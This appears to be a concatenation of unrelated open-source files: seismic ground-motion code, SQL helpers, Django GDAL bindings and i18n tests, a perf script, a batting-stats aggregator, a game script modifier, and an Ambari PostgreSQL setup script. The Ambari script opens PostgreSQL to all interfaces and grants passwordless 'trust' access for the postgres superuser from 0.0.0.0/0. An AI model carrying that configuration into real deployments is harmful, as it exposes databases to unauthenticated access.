tests. In this version the total standard deviation is fixed at 0.65
"""
#: Only the total standars deviation is defined
DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
const.StdDev.TOTAL,
])
#: The PEER tests requires only PGA
DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
PGA,
])
def _get_stddevs(self, sites, rup, C, stddev_types, ln_y_ref, exp1, exp2):
"""
Returns the standard deviation, which is fixed at 0.65 for every site
"""
ret = []
for stddev_type in stddev_types:
assert stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
if stddev_type == const.StdDev.TOTAL:
# eq. 13
ret.append(0.65 * np.ones_like(sites.vs30))
return ret
class ChiouYoungs2014NearFaultEffect(ChiouYoungs2014):
"""
This implements the Chiou & Youngs (2014) GMPE include the near fault
effect prediction. In this version, we add the distance measure, rcdpp
for directivity prediction.
"""
#: Required distance measures are RRup, Rjb, Rx, and Rcdpp
REQUIRES_DISTANCES = set(('rrup', 'rjb', 'rx', 'rcdpp'))
def _get_centered_cdpp(self, dists):
"""
Get directivity prediction parameter centered on the avgerage
directivity prediction parameter.
"""
centered_dpp = dists.rcdpp
return centered_dpp
| agpl-3.0 |
GreatFruitOmsk/screenly-ose | lib/queries.py | 3 | 1135 |
comma = ','.join
quest = lambda l: '=?,'.join(l) + '=?'
quest_2 = lambda l, c: ', '.join([('%s=CASE ' % x) + ("WHEN asset_id=? THEN ? " * c) + 'ELSE asset_id END' for x in l])
exists_table = "SELECT name FROM sqlite_master WHERE type='table' AND name='assets'"
read_all = lambda keys: 'select ' + comma(keys) + ' from assets order by play_order'
read = lambda keys: 'select ' + comma(keys) + ' from assets where asset_id=?'
create = lambda keys: 'insert into assets (' + comma(keys) + ') values (' + comma(['?'] * len(keys)) + ')'
remove = 'delete from assets where asset_id=?'
update = lambda keys: 'update assets set ' + quest(keys) + ' where asset_id=?'
multiple_update = lambda keys, count: \
'UPDATE assets SET ' + quest(keys) + ' WHERE asset_id IN (' + comma(['?'] * count) + ')'
multiple_update_not_in = lambda keys, count: \
'UPDATE assets SET ' + quest(keys) + ' WHERE asset_id NOT IN (' + comma(['?'] * count) + ')'
multiple_update_with_case = lambda keys, count: 'UPDATE assets SET ' + quest_2(keys, count) + \
' WHERE asset_id IN (' + comma(['?'] * count) + ')'
| gpl-2.0 |
rvmoura96/projeto-almoxarifado | myvenv/Lib/site-packages/django/contrib/gis/gdal/prototypes/geom.py | 181 | 4946 | from ctypes import POINTER, c_char_p, c_double, c_int, c_void_p
from django.contrib.gis.gdal.envelope import OGREnvelope
from django.contrib.gis.gdal.libgdal import lgdal
from django.contrib.gis.gdal.prototypes.errcheck import check_envelope
from django.contrib.gis.gdal.prototypes.generation import (
const_string_output, double_output, geom_output, int_output, srs_output,
string_output, void_output,
)
# ### Generation routines specific to this module ###
def env_func(f, argtypes):
"For getting OGREnvelopes."
f.argtypes = argtypes
f.restype = None
f.errcheck = check_envelope
return f
def pnt_func(f):
"For accessing point information."
return double_output(f, [c_void_p, c_int])
def topology_func(f):
f.argtypes = [c_void_p, c_void_p]
f.restype = c_int
f.errcheck = lambda result, func, cargs: bool(result)
return f
# ### OGR_G ctypes function prototypes ###
# GeoJSON routines.
from_json = geom_output(lgdal.OGR_G_CreateGeometryFromJson, [c_char_p])
to_json = string_output(lgdal.OGR_G_ExportToJson, [c_void_p], str_result=True, decoding='ascii')
to_kml = string_output(lgdal.OGR_G_ExportToKML, [c_void_p, c_char_p], str_result=True, decoding='ascii')
# GetX, GetY, GetZ all return doubles.
getx = pnt_func(lgdal.OGR_G_GetX)
gety = pnt_func(lgdal.OGR_G_GetY)
getz = pnt_func(lgdal.OGR_G_GetZ)
# Geometry creation routines.
from_wkb = geom_output(lgdal.OGR_G_CreateFromWkb, [c_char_p, c_void_p, POINTER(c_void_p), c_int], offset=-2)
from_wkt = geom_output(lgdal.OGR_G_CreateFromWkt, [POINTER(c_char_p), c_void_p, POINTER(c_void_p)], offset=-1)
from_gml = geom_output(lgdal.OGR_G_CreateFromGML, [c_char_p])
create_geom = geom_output(lgdal.OGR_G_CreateGeometry, [c_int])
clone_geom = geom_output(lgdal.OGR_G_Clone, [c_void_p])
get_geom_ref = geom_output(lgdal.OGR_G_GetGeometryRef, [c_void_p, c_int])
get_boundary = geom_output(lgdal.OGR_G_GetBoundary, [c_void_p])
geom_convex_hull = geom_output(lgdal.OGR_G_ConvexHull, [c_void_p])
geom_diff = geom_output(lgdal.OGR_G_Difference, [c_void_p, c_void_p])
geom_intersection = geom_output(lgdal.OGR_G_Intersection, [c_void_p, c_void_p])
geom_sym_diff = geom_output(lgdal.OGR_G_SymmetricDifference, [c_void_p, c_void_p])
geom_union = geom_output(lgdal.OGR_G_Union, [c_void_p, c_void_p])
# Geometry modification routines.
add_geom = void_output(lgdal.OGR_G_AddGeometry, [c_void_p, c_void_p])
import_wkt = void_output(lgdal.OGR_G_ImportFromWkt, [c_void_p, POINTER(c_char_p)])
# Destroys a geometry
destroy_geom = void_output(lgdal.OGR_G_DestroyGeometry, [c_void_p], errcheck=False)
# Geometry export routines.
to_wkb = void_output(lgdal.OGR_G_ExportToWkb, None, errcheck=True) # special handling for WKB.
to_wkt = string_output(lgdal.OGR_G_ExportToWkt, [c_void_p, POINTER(c_char_p)], decoding='ascii')
to_gml = string_output(lgdal.OGR_G_ExportToGML, [c_void_p], str_result=True, decoding='ascii')
get_wkbsize = int_output(lgdal.OGR_G_WkbSize, [c_void_p])
# Geometry spatial-reference related routines.
assign_srs = void_output(lgdal.OGR_G_AssignSpatialReference, [c_void_p, c_void_p], errcheck=False)
get_geom_srs = srs_output(lgdal.OGR_G_GetSpatialReference, [c_void_p])
# Geometry properties
get_area = double_output(lgdal.OGR_G_GetArea, [c_void_p])
get_centroid = void_output(lgdal.OGR_G_Centroid, [c_void_p, c_void_p])
get_dims = int_output(lgdal.OGR_G_GetDimension, [c_void_p])
get_coord_dim = int_output(lgdal.OGR_G_GetCoordinateDimension, [c_void_p])
set_coord_dim = void_output(lgdal.OGR_G_SetCoordinateDimension, [c_void_p, c_int], errcheck=False)
is_empty = int_output(lgdal.OGR_G_IsEmpty, [c_void_p], errcheck=lambda result, func, cargs: bool(result))
get_geom_count = int_output(lgdal.OGR_G_GetGeometryCount, [c_void_p])
get_geom_name = const_string_output(lgdal.OGR_G_GetGeometryName, [c_void_p], decoding='ascii')
get_geom_type = int_output(lgdal.OGR_G_GetGeometryType, [c_void_p])
get_point_count = int_output(lgdal.OGR_G_GetPointCount, [c_void_p])
get_point = void_output(
lgdal.OGR_G_GetPoint,
[c_void_p, c_int, POINTER(c_double), POINTER(c_double), POINTER(c_double)], errcheck=False
)
geom_close_rings = void_output(lgdal.OGR_G_CloseRings, [c_void_p], errcheck=False)
# Topology routines.
ogr_contains = topology_func(lgdal.OGR_G_Contains)
ogr_crosses = topology_func(lgdal.OGR_G_Crosses)
ogr_disjoint = topology_func(lgdal.OGR_G_Disjoint)
ogr_equals = topology_func(lgdal.OGR_G_Equals)
ogr_intersects = topology_func(lgdal.OGR_G_Intersects)
ogr_overlaps = topology_func(lgdal.OGR_G_Overlaps)
ogr_touches = topology_func(lgdal.OGR_G_Touches)
ogr_within = topology_func(lgdal.OGR_G_Within)
# Transformation routines.
geom_transform = void_output(lgdal.OGR_G_Transform, [c_void_p, c_void_p])
geom_transform_to = void_output(lgdal.OGR_G_TransformTo, [c_void_p, c_void_p])
# For retrieving the envelope of the geometry.
get_envelope = env_func(lgdal.OGR_G_GetEnvelope, [c_void_p, POINTER(OGREnvelope)])
| mit |
zouzhberk/ambaridemo | demo-server/src/main/resources/stacks/BIGTOP/0.8/services/HIVE/package/scripts/postgresql_server.py | 4 | 5069 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from resource_management import *
from postgresql_service import postgresql_service
class PostgreSQLServer(Script):
def install(self, env):
self.install_packages(env)
self.configure(env)
def configure(self, env):
import params
env.set_params(params)
# init the database, the ':' makes the command always return 0 in case the database has
# already been initialized when the postgresql server colocates with ambari server
Execute(format("service {postgresql_daemon_name} initdb || :"))
# update the configuration files
self.update_pghda_conf(env)
self.update_postgresql_conf(env)
# Reload the settings and start the postgresql server for the changes to take effect
# Note: Don't restart the postgresql server because when Ambari server and the hive metastore on the same machine,
# they will share the same postgresql server instance. Restarting the postgresql database may cause the ambari server database connection lost
postgresql_service(postgresql_daemon_name=params.postgresql_daemon_name, action = 'reload')
# ensure the postgresql server is started because the add hive metastore user requires the server is running.
self.start(env)
# create the database and hive_metastore_user
File(params.postgresql_adduser_path,
mode=0755,
content=StaticFile(format("{postgresql_adduser_file}"))
)
cmd = format("bash -x {postgresql_adduser_path} {postgresql_daemon_name} {hive_metastore_user_name} {hive_metastore_user_passwd!p} {db_name}")
Execute(cmd,
tries=3,
try_sleep=5,
path='/usr/sbin:/sbin:/usr/local/bin:/bin:/usr/bin'
)
def start(self, env):
import params
env.set_params(params)
postgresql_service(postgresql_daemon_name=params.postgresql_daemon_name, action = 'start')
def stop(self, env):
import params
env.set_params(params)
postgresql_service(postgresql_daemon_name=params.postgresql_daemon_name, action = 'stop')
def status(self, env):
import status_params
postgresql_service(postgresql_daemon_name=status_params.postgresql_daemon_name, action = 'status')
def update_postgresql_conf(self, env):
import params
env.set_params(params)
# change the listen_address to *
Execute(format("sed -i '/^[[:space:]]*listen_addresses[[:space:]]*=.*/d' {postgresql_conf_path}"))
Execute(format("echo \"listen_addresses = '*'\" | tee -a {postgresql_conf_path}"))
# change the standard_conforming_string to off
Execute(format("sed -i '/^[[:space:]]*standard_conforming_strings[[:space:]]*=.*/d' {postgresql_conf_path}"))
Execute(format("echo \"standard_conforming_strings = off\" | tee -a {postgresql_conf_path}"))
def update_pghda_conf(self, env):
import params
env.set_params(params)
# trust hive_metastore_user and postgres locally
Execute(format("sed -i '/^[[:space:]]*local[[:space:]]*all[[:space:]]*all.*$/s/^/#/' {postgresql_pghba_conf_path}"))
Execute(format("sed -i '/^[[:space:]]*local[[:space:]]*all[[:space:]]*postgres.*$/d' {postgresql_pghba_conf_path}"))
Execute(format("sed -i '/^[[:space:]]*local[[:space:]]*all[[:space:]]*\"{hive_metastore_user_name}\".*$/d' {postgresql_pghba_conf_path}"))
Execute(format("echo \"local all postgres trust\" | tee -a {postgresql_pghba_conf_path}"))
Execute(format("echo \"local all \\\"{hive_metastore_user_name}\\\" trust\" | tee -a {postgresql_pghba_conf_path}"))
# trust hive_metastore_user and postgres via local interface
Execute(format("sed -i '/^[[:space:]]*host[[:space:]]*all[[:space:]]*all.*$/s/^/#/' {postgresql_pghba_conf_path}"))
Execute(format("sed -i '/^[[:space:]]*host[[:space:]]*all[[:space:]]*postgres.*$/d' {postgresql_pghba_conf_path}"))
Execute(format("sed -i '/^[[:space:]]*host[[:space:]]*all[[:space:]]*\"{hive_metastore_user_name}\".*$/d' {postgresql_pghba_conf_path}"))
Execute(format("echo \"host all postgres 0.0.0.0/0 trust\" | tee -a {postgresql_pghba_conf_path}"))
Execute(format("echo \"host all \\\"{hive_metastore_user_name}\\\" 0.0.0.0/0 trust\" | tee -a {postgresql_pghba_conf_path}"))
if __name__ == "__main__":
PostgreSQLServer().execute()
| apache-2.0 |
boa19861105/BOA-M7_U | tools/perf/python/twatch.py | 7370 | 1334 | #! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
cpus = perf.cpu_map()
threads = perf.thread_map()
evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
wakeup_events = 1, watermark = 1,
sample_id_all = 1,
sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
evsel.open(cpus = cpus, threads = threads);
evlist = perf.evlist(cpus, threads)
evlist.add(evsel)
evlist.mmap()
while True:
evlist.poll(timeout = -1)
for cpu in cpus:
event = evlist.read_on_cpu(cpu)
if not event:
continue
print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
event.sample_pid,
event.sample_tid),
print event
if __name__ == '__main__':
main()
| gpl-2.0 |
dondrake/mlb_stats_spark | BattingStats.py | 1 | 5584 | import re
class BattingStats(object):
def __init__(self):
self.game_id = ""
self.player_id = 0
self.ab = 0
self._1b = 0
self._2b = 0
self.fd_points_2b = 0.0
self._3b = 0
self.fd_points_3b = 0.0
self.hr = 0
self.fd_points_hr = 0.0
self.rbi = 0
self.r = 0
self.bb = 0
self.sb = 0
self.fd_points_sb = 0.0
self.hbp = 0
self.out = 0
self.fd_points_out = 0.0
self.total_hits = 0
self.fd_points_tb = 0.0
self.fd_points = 0.0
def __repr__(self):
return str(self.__dict__)
def __add__(self, other):
b = BattingStats()
# don't agg dims
b.game_id = self.game_id
b.player_id = self.player_id
b.ab = self.ab + other.ab
b._1b = self._1b + other._1b
b._2b = self._2b + other._2b
b.fd_points_2b = self.fd_points_2b + other.fd_points_2b
b._3b = self._3b + other._3b
b.fd_points_3b = self.fd_points_3b + other.fd_points_3b
b.hr = self.hr + other.hr
b.fd_points_hr = self.fd_points_hr + other.fd_points_hr
b.rbi = self.rbi + other.rbi
b.r = self.r + other.r
b.bb = self.bb + other.bb
b.sb = self.sb + other.sb
b.fd_points_sb = self.fd_points_sb + other.fd_points_sb
b.hbp = self.hbp + other.hbp
b.out = self.out + other.out
b.fd_points_out = self.fd_points_out + other.fd_points_out
b.total_hits = self.total_hits + other.total_hits
b.fd_points_tb = self.fd_points_tb + other.fd_points_tb
b.fd_points = self.fd_points + other.fd_points
return b
def handleFDEvent(self, event):
# Runs are under counted, we need to look up all player names:
# Kole Calhoun homers (2) on a fly ball to right center field. Chris Iannetta scores. Johnny Giavotella scores.
# This should be handled upstream...
# This is for WPs (pitcher stats)
if event.batter <= 0:
return
self.game_id = event.game_id
self.player_id = event.batter
self.ab += 1
if event.fd_batter_event in ['SO', 'O']:
self.out += 1
elif event.fd_batter_event == 'H':
self._1b += 1
self.total_hits +=1
elif event.fd_batter_event == 'W':
self.bb += 1
self.ab -= 1
elif event.fd_batter_event == 'HR':
self.hr += 1
self.total_hits +=1
self.rbi +=1
self.r +=1
elif event.fd_batter_event == 'HBP':
self.hbp += 1
self.ab -= 1
elif event.fd_batter_event == 'SB':
self.sb += 1
self.ab -= 1
elif event.fd_batter_event == '2B':
self._2b += 1
self.total_hits +=1
elif event.fd_batter_event == '3B':
self._3b += 1
self.total_hits +=1
elif event.fd_batter_event == 'R':
# Fake event from below
self.r += 1
self.ab -= 1
elif event.fd_batter_event == 'SAC':
# not a hit, but doesnt count as an at bat
self.ab -= 1
elif event.fd_batter_event == 'FC':
# not a hit, but does count as an at bat
pass
elif event.fd_batter_event == 'E':
# counts as atbat
pass
elif event.fd_batter_event == 'BALK':
self.ab -= 1
elif event.fd_batter_event is None:
if "is now pitching" in event.des:
# switch-pitcher!?!
# 'unhandled event:', None, u'Pat Venditte is now pitching right-handed. ', u'gid_2015_03_03_sfnmlb_oakmlb_1', 519381, -1)
pass
else:
raise Exception("unhandled event:", event.fd_batter_event, event.des, event.game_id, event.batter, event.pitcher)
# find: all occurences of
# 'Russell Martin doubles (8) on a sharp fly ball to right fielder Marlon Byrd. Andrew McCutchen scores. Neil Walker scores. '
res = re.findall('[\w ]+ scores\.', event.des)
if res is not None:
self.rbi += len(res)
self.out = self.ab - self.total_hits
fantasyPoints = 0.0
fantasyPoints += (3.0 * self._1b)
fantasyPoints += (6.0 * self._2b)
fantasyPoints += (9.0 * self._3b)
fantasyPoints += (12.0 * self.hr)
fantasyPoints += (3.5 * self.rbi)
fantasyPoints += (3.2 * self.r)
fantasyPoints += (3.0 * self.bb)
fantasyPoints += (6.0 * self.sb)
fantasyPoints += (3.0 * self.hbp)
#fantasyPoints -= (0.25 * self.out)
#fantasyPoints /= player['G']
self.fd_points = fantasyPoints
self.fd_points_2b += (6.0 * self._2b)
self.fd_points_3b += (9.0 * self._3b)
self.fd_points_hr += (12.0 * self.hr)
self.fd_points_sb += (6.0 * self.sb)
#self.fd_points_out -= (0.25 * self.out)
self.fd_points_tb += self.bb + self._1b + self.fd_points_2b + self.fd_points_3b + self.fd_points_hr
@staticmethod
def mapEventstoBattingStats(event):
battingStats = BattingStats()
battingStats.handleFDEvent(event)
key = "|".join(map(str, [event.game_id, event.batter]))
return (key, battingStats)
@staticmethod
def reduceByKey(a, b):
if a is None:
return b
#print "a=", a
#print "b=", b
c = a + b
#print "c=", c
return c
| apache-2.0 |
Lyrositor/moul-scripts | Python/xAgeSDLBoolShowHide.py | 12 | 5302 | # -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email legal@cyan.com
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
from Plasma import *
from PlasmaTypes import *
sdlName = ptAttribString(1, "Age SDL Var Name")
showOnTrue = ptAttribBoolean(2, "Show on true", default=True)
defaultValue = ptAttribBoolean(3, "Default setting", default=False)
evalOnFirstUpdate = ptAttribBoolean(4, "Eval On First Update?", default=False)
class xAgeSDLBoolShowHide(ptMultiModifier, object):
"""Shows or hides attached SceneObjects based on the value of an SDL boolean variable"""
def __init__(self):
ptMultiModifier.__init__(self)
self.id = 5037
self.version = 2
def OnBackdoorMsg(self, target, param):
if sdlName.value:
if target == sdlName.value:
if param.lower() in {"on", "1", "true"}:
self._EnableObject()
elif param.lower() in {"off", "0", "false"}:
self._DisableObject()
else:
PtDebugPrint("xAgeSDLBoolShowHide.OnBackDoorMsg: Received unexpected parameter on %s" % self.sceneobject.getName())
def OnFirstUpdate(self):
if evalOnFirstUpdate.value:
self._Setup()
def OnSDLNotify(self, VARname, SDLname, playerID, tag):
if VARname == sdlName.value:
ageSDL = PtGetAgeSDL()
self.sdl_value = ageSDL[sdlName.value][0]
def OnServerInitComplete(self):
if not evalOnFirstUpdate.value:
self._Setup()
def _DisableObject(self):
PtDebugPrint("xAgeSDLBoolShowHide.DisableObject: Attempting to disable drawing and collision on %s..." % self.sceneobject.getName(), level=kDebugDumpLevel)
self.sceneobject.draw.disable()
self.sceneobject.physics.suppress(True)
def _EnableObject(self):
PtDebugPrint("xAgeSDLBoolShowHide.EnableObject: Attempting to enable drawing and collision on %s..." % self.sceneobject.getName(), level=kDebugDumpLevel)
self.sceneobject.draw.enable()
self.sceneobject.physics.suppress(False)
def _Setup(self):
ageSDL = PtGetAgeSDL()
if not ageSDL:
PtDebugPrint("xAgeSDLBoolShowHide._Setup():\tAgeSDLHook is null... You've got problems, friend.")
self.sdl_value = defaultValue.value # start at default
return None
if sdlName.value:
# So, apparently, Cyan's artists like trailing whitespace...
if sdlName.value.find(" ") != -1:
PtDebugPrint("xAgeSDLBoolShowHide._Setup():\tWARNING: %s's SDL variable '%s' has whitespace. Removing!" % (self.sceneobject.getName(), sdlName.value))
sdlName.value = sdlName.value.replace(" ", "")
ageSDL.setFlags(sdlName.value, 1, 1)
ageSDL.sendToClients(sdlName.value)
ageSDL.setNotify(self.key, sdlName.value, 0.0)
# Sometimes, Cyan's artists just fail.
try:
self.sdl_value = ageSDL[sdlName.value][0]
except LookupError:
PtDebugPrint("xAgeSDLBoolShowHide._Setup():\tVariable '%s' is invalid on object '%s'" % (sdlName.value, self.sceneobject.getName()))
self.sdl_value = defaultValue.value
else:
self.sdl_value = defaultValue.value # start at default
raise RuntimeError("You forgot to set the SDL Variable Name!")
def _set_sdl_value(self, value):
if value ^ showOnTrue.value:
self._DisableObject()
else:
self._EnableObject()
sdl_value = property(fset=_set_sdl_value)
| gpl-3.0 |
ChenJunor/hue | desktop/core/ext-py/Django-1.6.10/tests/view_tests/tests/test_i18n.py | 40 | 10256 | # -*- coding:utf-8 -*-
from __future__ import absolute_import
import gettext
import os
from os import path
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import LiveServerTestCase, TestCase
from django.test.utils import override_settings
from django.utils import six, unittest
from django.utils._os import upath
from django.utils.module_loading import import_by_path
from django.utils.translation import override
from django.utils.text import javascript_quote
from ..urls import locale_dir
class I18NTests(TestCase):
""" Tests django views in django/views/i18n.py """
def test_setlang(self):
"""
The set_language view can be used to change the session language.
The user is redirected to the 'next' argument if provided.
"""
for lang_code, lang_name in settings.LANGUAGES:
post_data = dict(language=lang_code, next='/views/')
response = self.client.post('/views/i18n/setlang/', data=post_data)
self.assertRedirects(response, 'http://testserver/views/')
self.assertEqual(self.client.session['django_language'], lang_code)
def test_setlang_unsafe_next(self):
"""
The set_language view only redirects to the 'next' argument if it is
"safe".
"""
lang_code, lang_name = settings.LANGUAGES[0]
post_data = dict(language=lang_code, next='//unsafe/redirection/')
response = self.client.post('/views/i18n/setlang/', data=post_data)
self.assertEqual(response.url, 'http://testserver/')
self.assertEqual(self.client.session['django_language'], lang_code)
def test_setlang_reversal(self):
self.assertEqual(reverse('set_language'), '/views/i18n/setlang/')
def test_jsi18n(self):
"""The javascript_catalog can be deployed with language settings"""
for lang_code in ['es', 'fr', 'ru']:
with override(lang_code):
catalog = gettext.translation('djangojs', locale_dir, [lang_code])
if six.PY3:
trans_txt = catalog.gettext('this is to be translated')
else:
trans_txt = catalog.ugettext('this is to be translated')
response = self.client.get('/views/jsi18n/')
# response content must include a line like:
# "this is to be translated": <value of trans_txt Python variable>
# javascript_quote is used to be able to check unicode strings
self.assertContains(response, javascript_quote(trans_txt), 1)
if lang_code == 'fr':
# Message with context (msgctxt)
self.assertContains(response, r'"month name\u0004May": "mai"', 1)
class JsI18NTests(TestCase):
"""
Tests django views in django/views/i18n.py that need to change
settings.LANGUAGE_CODE.
"""
def test_jsi18n_with_missing_en_files(self):
"""
The javascript_catalog shouldn't load the fallback language in the
case that the current selected language is actually the one translated
from, and hence missing translation files completely.
This happens easily when you're translating from English to other
languages and you've set settings.LANGUAGE_CODE to some other language
than English.
"""
with self.settings(LANGUAGE_CODE='es'):
with override('en-us'):
response = self.client.get('/views/jsi18n/')
self.assertNotContains(response, 'esto tiene que ser traducido')
def test_jsi18n_fallback_language(self):
"""
Let's make sure that the fallback language is still working properly
in cases where the selected language cannot be found.
"""
with self.settings(LANGUAGE_CODE='fr'):
with override('fi'):
response = self.client.get('/views/jsi18n/')
self.assertContains(response, 'il faut le traduire')
def testI18NLanguageNonEnglishDefault(self):
"""
Check if the Javascript i18n view returns an empty language catalog
if the default language is non-English, the selected language
is English and there is not 'en' translation available. See #13388,
#3594 and #13726 for more details.
"""
with self.settings(LANGUAGE_CODE='fr'):
with override('en-us'):
response = self.client.get('/views/jsi18n/')
self.assertNotContains(response, 'Choisir une heure')
def test_nonenglish_default_english_userpref(self):
"""
Same as above with the difference that there IS an 'en' translation
available. The Javascript i18n view must return a NON empty language catalog
with the proper English translations. See #13726 for more details.
"""
extended_apps = list(settings.INSTALLED_APPS) + ['view_tests.app0']
with self.settings(LANGUAGE_CODE='fr', INSTALLED_APPS=extended_apps):
with override('en-us'):
response = self.client.get('/views/jsi18n_english_translation/')
self.assertContains(response, javascript_quote('this app0 string is to be translated'))
def testI18NLanguageNonEnglishFallback(self):
"""
Makes sure that the fallback language is still working properly
in cases where the selected language cannot be found.
"""
with self.settings(LANGUAGE_CODE='fr'):
with override('none'):
response = self.client.get('/views/jsi18n/')
self.assertContains(response, 'Choisir une heure')
class JsI18NTestsMultiPackage(TestCase):
"""
Tests for django views in django/views/i18n.py that need to change
settings.LANGUAGE_CODE and merge JS translation from several packages.
"""
def testI18NLanguageEnglishDefault(self):
"""
Check if the JavaScript i18n view returns a complete language catalog
if the default language is en-us, the selected language has a
translation available and a catalog composed by djangojs domain
translations of multiple Python packages is requested. See #13388,
#3594 and #13514 for more details.
"""
extended_apps = list(settings.INSTALLED_APPS) + ['view_tests.app1', 'view_tests.app2']
with self.settings(LANGUAGE_CODE='en-us', INSTALLED_APPS=extended_apps):
with override('fr'):
response = self.client.get('/views/jsi18n_multi_packages1/')
self.assertContains(response, javascript_quote('il faut traduire cette chaîne de caractères de app1'))
def testI18NDifferentNonEnLangs(self):
"""
Similar to above but with neither default or requested language being
English.
"""
extended_apps = list(settings.INSTALLED_APPS) + ['view_tests.app3', 'view_tests.app4']
with self.settings(LANGUAGE_CODE='fr', INSTALLED_APPS=extended_apps):
with override('es-ar'):
response = self.client.get('/views/jsi18n_multi_packages2/')
self.assertContains(response, javascript_quote('este texto de app3 debe ser traducido'))
def testI18NWithLocalePaths(self):
extended_locale_paths = settings.LOCALE_PATHS + (
path.join(path.dirname(
path.dirname(path.abspath(upath(__file__)))), 'app3', 'locale'),)
with self.settings(LANGUAGE_CODE='es-ar', LOCALE_PATHS=extended_locale_paths):
with override('es-ar'):
response = self.client.get('/views/jsi18n/')
self.assertContains(response,
javascript_quote('este texto de app3 debe ser traducido'))
skip_selenium = not os.environ.get('DJANGO_SELENIUM_TESTS', False)
@unittest.skipIf(skip_selenium, 'Selenium tests not requested')
class JavascriptI18nTests(LiveServerTestCase):
available_apps = []
urls = 'view_tests.urls'
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
@classmethod
def setUpClass(cls):
try:
cls.selenium = import_by_path(cls.webdriver_class)()
except Exception as e:
raise unittest.SkipTest('Selenium webdriver "%s" not installed or '
'not operational: %s' % (cls.webdriver_class, str(e)))
super(JavascriptI18nTests, cls).setUpClass()
@classmethod
def tearDownClass(cls):
cls.selenium.quit()
super(JavascriptI18nTests, cls).tearDownClass()
@override_settings(LANGUAGE_CODE='de')
def test_javascript_gettext(self):
extended_apps = list(settings.INSTALLED_APPS) + ['view_tests']
with self.settings(INSTALLED_APPS=extended_apps):
self.selenium.get('%s%s' % (self.live_server_url, '/jsi18n_template/'))
elem = self.selenium.find_element_by_id("gettext")
self.assertEqual(elem.text, "Entfernen")
elem = self.selenium.find_element_by_id("ngettext_sing")
self.assertEqual(elem.text, "1 Element")
elem = self.selenium.find_element_by_id("ngettext_plur")
self.assertEqual(elem.text, "455 Elemente")
elem = self.selenium.find_element_by_id("pgettext")
self.assertEqual(elem.text, "Kann")
elem = self.selenium.find_element_by_id("npgettext_sing")
self.assertEqual(elem.text, "1 Resultat")
elem = self.selenium.find_element_by_id("npgettext_plur")
self.assertEqual(elem.text, "455 Resultate")
def test_escaping(self):
extended_apps = list(settings.INSTALLED_APPS) + ['view_tests']
with self.settings(INSTALLED_APPS=extended_apps):
# Force a language via GET otherwise the gettext functions are a noop!
response = self.client.get('/jsi18n_admin/?language=de')
self.assertContains(response, '\\x04')
class JavascriptI18nChromeTests(JavascriptI18nTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class JavascriptI18nIETests(JavascriptI18nTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| apache-2.0 |
lombritz/odoo | openerp/addons/base/tests/test_translate.py | 460 | 1941 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010 OpenERP S.A. http://www.openerp.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import unittest
from openerp.tools.translate import quote, unquote
class TranslationToolsTestCase(unittest.TestCase):
def test_quote_unquote(self):
def test_string(str):
quoted = quote(str)
#print "\n1:", repr(str)
#print "2:", repr(quoted)
unquoted = unquote("".join(quoted.split('"\n"')))
